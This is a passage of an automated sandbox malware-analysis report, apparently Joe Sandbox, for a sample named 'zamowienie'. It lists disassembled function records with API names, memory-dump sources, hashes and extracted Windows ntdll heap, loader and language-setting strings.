                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                              • Opcode ID: 9410fb65a587ef4007a2fa7dd5f041a35aea6c0b330589a729b3e02bf495593e
                                                                                                                                              • Instruction ID: 5418d0906872418b9afcf4855bcf838895121edd87fd6b3a163bba3c218be76b
                                                                                                                                              • Opcode Fuzzy Hash: 9410fb65a587ef4007a2fa7dd5f041a35aea6c0b330589a729b3e02bf495593e
                                                                                                                                              • Instruction Fuzzy Hash: 225170BA7043459FE70DDF65CA84B2A7BF8FB49244F1804E9E54AEB350E7309910CB59
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EC6
                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405EDE
                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EEF
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406111,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EF8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                              • Opcode ID: 5cac60a44e2266709049edbfd25ede4b753d9409f8219a4c9632319a7255b88a
                                                                                                                                              • Instruction ID: 4ace56e23d5ac1e3a407fb50117488eac73a934bc2de81493ee403e7c119bc47
                                                                                                                                              • Opcode Fuzzy Hash: 5cac60a44e2266709049edbfd25ede4b753d9409f8219a4c9632319a7255b88a
                                                                                                                                              • Instruction Fuzzy Hash: 12F0F631104458FFC7029FA5CD00D9FBBA8EF15354B2540BAE940F7211D634EE01ABAD

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:0%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:100%
                                                                                                                                              Total number of Nodes:1
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 82143 34f32c70 LdrInitializeThunk

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 2 34f335c0-34f335cc LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f625390ffcaf392ed963ee43d7e3927541a4547b007509fff1633f6399e0ef11
                                                                                                                                              • Instruction ID: d622abef43a1e1dc7702050842f872105ea650d983bf8c39fa7ab117aa2abd15
                                                                                                                                              • Opcode Fuzzy Hash: f625390ffcaf392ed963ee43d7e3927541a4547b007509fff1633f6399e0ef11
                                                                                                                                              • Instruction Fuzzy Hash: 5290023564550413D1007158C51470614054BD0205F69C812A042553CD8BD5CA5665A3

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 0 34f32c70-34f32c7c LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: d22a9af74de35115abca7372f30723bc902f6866c329b834ca3c1bd3c7a67da0
                                                                                                                                              • Instruction ID: 5ba91059b7fb922ac0f5f342a48566941a83976a20d4ba3d4fa2e36b144e05c0
                                                                                                                                              • Opcode Fuzzy Hash: d22a9af74de35115abca7372f30723bc902f6866c329b834ca3c1bd3c7a67da0
                                                                                                                                              • Instruction Fuzzy Hash: CE90023524148813D1107158C40474A04054BD0305F5DC812A442562CD8AD5C9967122

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1 34f32df0-34f32dfc LdrInitializeThunk
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 2b6d1e2c6ed4c8781addc3f245f31a270cdff5efd78001fbabf24439fb15343a
                                                                                                                                              • Instruction ID: 150e11130f7b6cbb43ffb9686b4a27ec9c8fc138289e94a00b83f4424c5cb098
                                                                                                                                              • Opcode Fuzzy Hash: 2b6d1e2c6ed4c8781addc3f245f31a270cdff5efd78001fbabf24439fb15343a
                                                                                                                                              • Instruction Fuzzy Hash: C990023524140423D1117158C50470704094BD0245F99C813A042552CD9A96CA57A122

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                              • API String ID: 0-2897834094
                                                                                                                                              • Opcode ID: b78f58916d3c8563d746913b171d8577890473f062fc700b16e4092f880b2ce3
                                                                                                                                              • Instruction ID: 62daa4fa7ccd0dbb8d76f19a30e3dfed09f4536f63b96d7ee2e4e8c362d7097a
                                                                                                                                              • Opcode Fuzzy Hash: b78f58916d3c8563d746913b171d8577890473f062fc700b16e4092f880b2ce3
                                                                                                                                              • Instruction Fuzzy Hash: 2F618F73A36252DFE206DB54D485D3473E9EF08671B0D489AEA009F652CB35ACC28FE5

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $ $0
                                                                                                                                              • API String ID: 3446177414-3352262554
                                                                                                                                              • Opcode ID: 6e5262ce5086726b3b41685aab11d04e5970201c4cb90069dce665a4cbd238d2
                                                                                                                                              • Instruction ID: ea471e50f826e52177fe0311ef6f62e14d251803ebf30eaa908d2c4e1cde04fd
                                                                                                                                              • Opcode Fuzzy Hash: 6e5262ce5086726b3b41685aab11d04e5970201c4cb90069dce665a4cbd238d2
                                                                                                                                              • Instruction Fuzzy Hash: 7432F2B16083818FE360CF68C984B9ABBE5BB88344F094D2EF59987350D775D94ACF52

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                              • API String ID: 3446177414-1700792311
                                                                                                                                              • Opcode ID: 123f15e8f2ebc85975deb2831b7db64399080e79e7e8603b3ed8790576e79350
                                                                                                                                              • Instruction ID: ea0d8d3d19039ac6fce4ac42796ec1f89be6aaeb91a6b08f85b7d4f2b2751907
                                                                                                                                              • Opcode Fuzzy Hash: 123f15e8f2ebc85975deb2831b7db64399080e79e7e8603b3ed8790576e79350
                                                                                                                                              • Instruction Fuzzy Hash: E8D1DE79910685DFEB06CF64E440AAEBBF1FF4A304F4C885DE845AB252C7359982CF54
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                              • API String ID: 3446177414-1745908468
                                                                                                                                              • Opcode ID: e8473f97dbf6c66dcafee958e1fd8b1f91c45902fb7cfba17eb9bed32e223006
                                                                                                                                              • Instruction ID: a14f9ffd4f4df626f52adf022c4245769920ade14baa661e7afbbc959558ba91
                                                                                                                                              • Opcode Fuzzy Hash: e8473f97dbf6c66dcafee958e1fd8b1f91c45902fb7cfba17eb9bed32e223006
                                                                                                                                              • Instruction Fuzzy Hash: A391DE76A10745DFEB05CF68C440AE9BBF2EF49314F18885DE445AB262CB369982CF64
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                              • API String ID: 0-3532704233
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 3446177414-3570731704
                                                                                                                                              APIs
                                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 34F1D959
                                                                                                                                                • Part of subcall function 34EF4859: RtlDebugPrintTimes.NTDLL ref: 34EF48F7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-1975516107
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                              • API String ID: 0-3063724069
                                                                                                                                              Strings
                                                                                                                                              • @, xrefs: 34EED0FD
                                                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 34EED146
                                                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 34EED196
                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 34EED2C3
                                                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 34EED262
                                                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 34EED0CF
                                                                                                                                              • @, xrefs: 34EED313
                                                                                                                                              • @, xrefs: 34EED2AF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                              • API String ID: 0-1356375266
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-4253913091
                                                                                                                                              Strings
                                                                                                                                              • RTL: Re-Waiting, xrefs: 34F6031E
                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 34F602E7
                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 34F602BD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                                              • API String ID: 3446177414-3127649145
                                                                                                                                              Strings
                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 34F1542B
                                                                                                                                              • WindowsExcludedProcs, xrefs: 34F1522A
                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 34F15247
                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 34F15352
                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 34F1527B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                              • API String ID: 0-258546922
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: This is located in the %s field of the heap header.$ -4`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                              • API String ID: 0-1168109116
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                              • API String ID: 0-3061284088
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
